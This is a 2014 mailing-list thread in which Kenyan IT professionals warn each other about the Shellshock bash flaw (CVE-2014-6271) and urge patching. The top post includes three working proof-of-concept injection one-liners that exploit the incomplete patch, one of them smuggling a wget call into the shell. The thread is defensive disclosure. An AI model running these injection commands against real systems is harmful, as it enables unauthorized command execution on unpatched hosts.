[kictanet] [Skunkworks] Bash Code Injection Vulnerabilty (CVE-2014-6271)

Gichuki John Chuksjonia chuksjonia at gmail.com
Fri Sep 26 13:16:56 EAT 2014 

This Vulnerability is worse than Heartbleed, even after patching Bash,
you can still inject into it.

rm -f echo && env -i  X='() { (a)=>\' bash -c 'echo date'; cat echo
rm -f echo && env -i  X='() { (a)=>\' bash -c 'echo ls -la'; cat echo
rm -f echo && env -i  X='() { (a)=>\' bash -c 'echo wget http://my.co.ke/';

Be prepared to patch, and still watch your systems, and patch later
on, when a full one is released.

On 9/26/14, Amarjit Labhuram via skunkworks <skunkworks at lists.my.co.ke> wrote:
> To the linux admins,
>
> here is some more info on Shellshock.
> http://www.bbc.com/news/technology-29361794/
>
> Have a great day!
>
> Warm regards,
> Amarjit Singh Labhuram.
>
> On Thu, Sep 25, 2014 at 5:08 PM, Laban Mwangi via skunkworks <
> skunkworks at lists.my.co.ke> wrote:
>
>> Any thing that uses bash (Linux/FreeBSD/OSX/Cygwin)... Potentially, this
>> includes your home router (dlink, linksys)!
>>
>> On Thu, Sep 25, 2014 at 8:38 AM, Bwana Lawi via skunkworks <
>> skunkworks at lists.my.co.ke> wrote:
>>
>>> If you are using Red Hat products, please have this patched.
>>>
>>> Read more here.
>>>
>>> _______________________________________________
>>> skunkworks mailing list
>>> skunkworks at lists.my.co.ke
>>> ------------
>>> List info, subscribe/unsubscribe
>>> http://lists.my.co.ke/cgi-bin/mailman/listinfo/skunkworks
>>> ------------
>>>
>>> Skunkworks Rules
>>> http://my.co.ke/phpbb/viewtopic.php?f=24&t=94
>>> ------------
>>> Other services @ http://my.co.ke
>>>
>>
>>
>> _______________________________________________
>> skunkworks mailing list
>> skunkworks at lists.my.co.ke
>> ------------
>> List info, subscribe/unsubscribe
>> http://lists.my.co.ke/cgi-bin/mailman/listinfo/skunkworks
>> ------------
>>
>> Skunkworks Rules
>> http://my.co.ke/phpbb/viewtopic.php?f=24&t=94
>> ------------
>> Other services @ http://my.co.ke
>>
>


-- 
-- 
Gichuki John Ndirangu, C.E.H , C.P.T.P, O.S.C.P
I.T Security Analyst and Penetration Tester
jgichuki at inbox d0t com

{FORUM}http://lists.my.co.ke/pipermail/security/
http://chuksjonia.blogspot.com/

More information about the KICTANet mailing list